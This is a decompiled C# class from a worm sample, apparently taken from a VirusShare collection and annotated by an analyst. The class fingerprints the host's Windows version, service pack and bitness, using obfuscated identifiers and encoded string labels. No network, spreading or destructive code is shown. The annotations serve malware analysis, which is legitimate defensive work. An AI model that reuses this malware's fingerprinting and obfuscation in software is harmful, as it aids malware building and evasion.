// Decompiled with JetBrains decompiler
// Type: Ҧ߲๒ʽ໙ୄᴘ.៷˴ᄨᥨᗽ
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
using System;
using System.Runtime.InteropServices;
namespace Ҧ߲๒ʽ໙ୄᴘ
{
/// <summary>
/// Host-fingerprinting helper from the decompiled sample. It reads the OS
/// version, queries kernel32 GetVersionEx, and checks one environment
/// variable, then concatenates the results into a single text tag.
/// </summary>
/// <remarks>
/// Every label except "[WINME]" is stored as an encoded literal and passed
/// through a decoder that lives in another class of the assembly, so the
/// plaintext labels cannot be read from this file. The meaning of the
/// decoder's second argument (always <c>true</c>) is likewise not visible here.
/// </remarks>
internal class \u17F7\u02F4ᄨᥨᗽ
{
    /// <summary>
    /// Builds the OS description tag: version label, then any matching
    /// markers from the GetVersionEx string field, then a bitness suffix.
    /// </summary>
    /// <returns>
    /// The concatenated tag. The version label part stays empty when the
    /// platform is not reported as Win32NT.
    /// </returns>
    public static string ఽ\u087CᏃ()
    {
        OperatingSystem os = Environment.OSVersion;
        string tag = "";

        if (os.Platform.ToString() == "Win32NT")
        {
            // Select the encoded label for this "major.minor.build" and
            // decode it once after the switch.
            // NOTE(review): the 4.x builds belong to Windows 98/ME, which
            // report PlatformID.Win32Windows, so those cases look like dead
            // code behind the Win32NT check above.
            // Any build not listed (everything from 6.2 upward included)
            // falls through to the default label.
            string encodedLabel;
            switch (\u17F7\u02F4ᄨᥨᗽ.\u0AE7ԵॻƂẺႦᛀળ(os.Version))
            {
                case "4.1.2222":
                    encodedLabel = "L0FGPEfYO8ENT0v4ERA=";
                    break;
                case "4.1.2600":
                    encodedLabel = "L0FGPEdP2DvBDUv4ERArHQ==";
                    break;
                case "4.9.3000":
                    // The only literal that is readable as stored.
                    encodedLabel = "[WINME]";
                    break;
                case "5.0.2195":
                    // Build number of Windows 2000.
                    encodedLabel = "L0FGPEdP2DvBDUv4CggICA==";
                    break;
                case "5.1.2600":
                case "5.2.3790":
                    // Build numbers of Windows XP and Server 2003.
                    encodedLabel = "L0FGPEfYO8ENT0v4MCg=";
                    break;
                case "6.0.6000":
                case "6.0.6001":
                case "6.0.6002":
                case "6.0.6003":
                    // 6.0 is the Vista / Server 2008 generation.
                    encodedLabel = "+w0SCBMbpHuKjhfE+g0XGAU=";
                    break;
                case "6.1.7600":
                case "6.1.7601":
                case "6.1.7602":
                case "6.1.7603":
                    // 6.1 is the Windows 7 / Server 2008 R2 generation.
                    encodedLabel = "+w0SCKR7io4TGxfE2w==";
                    break;
                default:
                    encodedLabel = "+RIPpHuKjhITGxI=";
                    break;
            }

            tag = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(encodedLabel, true);
        }

        // The native call requires the structure size in its first field.
        \u17F7\u02F4ᄨᥨᗽ.ᴀᅒ\u007Eਗ਼ߎᘘᒯܡᤄ info = new \u17F7\u02F4ᄨᥨᗽ.ᴀᅒ\u007Eਗ਼ߎᘘᒯܡᤄ();
        info.ܨ = Marshal.SizeOf(typeof (\u17F7\u02F4ᄨᥨᗽ.ᴀᅒ\u007Eਗ਼ߎᘘᒯܡᤄ));

        if (\u17F7\u02F4ᄨᥨᗽ.ᰐረἣە\u104C(ref info))
        {
            // Each row is { encoded needle, encoded suffix }. The suffix is
            // appended when the 128-character string field contains the
            // decoded needle.
            // NOTE(review): presumably service-pack names; the first seven
            // needles differ only in their last character. Confirm by
            // decoding them with the sample's own routine.
            string[][] markers =
            {
                new[] { "8wUSFgkDBaDMBSXA8AEDC8DR", "OGsYVzSwaEk=" },
                new[] { "8wUSFgkDBaDMBSXA8AEDC8DS", "OGsYVzSwaEo=" },
                new[] { "8wUSFgkDBaDMBSXA8AEDC8DT", "OGsYVzSwaEs=" },
                new[] { "8wUSFgkDBaDMBSXA8AEDC8DU", "OGsYVzSwaEw=" },
                new[] { "8wUSFgkDBaDMBSXA8AEDC8DV", "OGsYVzSwaE0=" },
                new[] { "8wUSFgkDBaDMBSXA8AEDC8DW", "OGsYVzSwaE4=" },
                new[] { "8wUSFgkDBaDMBSXA8AEDC8DX", "OGsYVzSwaE8=" },
                new[] { "a32KjoF7fRhXNLA4aHl7gzhQ", "iLtoXUo8uKA=" },
                new[] { "a32KjoF7fRhXNLA4aHl7gzhR", "iLtoXUo8uKE=" },
            };

            string versionText = info.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString();
            foreach (string[] marker in markers)
            {
                if (versionText.Contains(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(marker[0], true)))
                {
                    tag += \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(marker[1], true);
                }
            }
        }

        // Final suffix depends on the ProgramW6432 check below.
        if (\u17F7\u02F4ᄨᥨᗽ.ᣁ())
        {
            return tag + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("iJWIaF1KPOCenA==", true);
        }

        return tag + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("iJWIaF1KPOCgng==", true);
    }

    /// <summary>
    /// Formats a version as "major.minor.build", dropping the revision part.
    /// </summary>
    /// <param name="_param0">Version to format.</param>
    /// <returns>The three components joined with dots.</returns>
    private static string \u0AE7ԵॻƂẺႦᛀળ(Version _param0)
    {
        string major = _param0.Major.ToString();
        string minor = _param0.Minor.ToString();
        string build = _param0.Build.ToString();
        return major + "." + minor + "." + build;
    }

    // P/Invoke binding for kernel32!GetVersionEx. The caller above sets the
    // size field before the call, and a true result means the structure was
    // filled in.
    [DllImport("kernel32.dll", EntryPoint = "GetVersionEx")]
    private static extern bool ᰐረἣە\u104C(ref \u17F7\u02F4ᄨᥨᗽ.ᴀᅒ\u007Eਗ਼ߎᘘᒯܡᤄ _param0);

    /// <summary>
    /// Reports whether the ProgramW6432 environment variable is set and
    /// non-empty.
    /// </summary>
    /// <returns>
    /// <c>true</c> when the variable has a value; <c>false</c> when it is
    /// missing, empty, or reading it throws.
    /// </returns>
    /// <remarks>
    /// ProgramW6432 is defined by 64-bit Windows, so this presumably serves
    /// as the sample's 64-bit OS indicator.
    /// </remarks>
    public static bool ᣁ()
    {
        try
        {
            string programFiles64 = Environment.GetEnvironmentVariable("ProgramW6432");
            return !string.IsNullOrEmpty(programFiles64);
        }
        catch
        {
            // Best effort: any failure is reported as "not set".
            return false;
        }
    }

    // Buffer passed to GetVersionEx. Field order and sizes (five ints, a
    // 128-character inline string, three shorts, two bytes) line up with the
    // Win32 OSVERSIONINFOEX layout. The member names in the comments below
    // are the presumed counterparts, since the obfuscated names carry no meaning.
    public struct ᴀᅒ\u007Eਗ਼ߎᘘᒯܡᤄ
    {
        // Structure size, set by the caller before the native call.
        public int ܨ;
        // Presumably dwMajorVersion.
        public int \u003Fᵚᇛჩᬃഢᨨ\u00F7;
        // Presumably dwMinorVersion.
        public int தጢ\u104Bᥞᶑᄧ᭐ώ\u0040;
        // Presumably dwBuildNumber.
        public int ᔥڟ;
        // Presumably dwPlatformId.
        public int ṏÕấᮺ\u087D;
        // Presumably szCSDVersion; the only field the class reads back.
        [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 128)]
        public string \u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E;
        // Presumably wServicePackMajor.
        public short ƹᗰ\u0FC0\u0A56uᅜ;
        // Presumably wServicePackMinor.
        public short \u0F72ြॽӰᢟ͒ᣃẈᅂ;
        // Presumably wSuiteMask.
        public short \u0F30ṋᄆᆃẈҤ;
        // Presumably wProductType.
        public byte \u1CED\u0EF0\u0B9BŢᵕ\u1398᩵ᗀἱ;
        // Presumably wReserved.
        public byte \u1DC7ഛեᮈ\u0FD9;
    }
}
}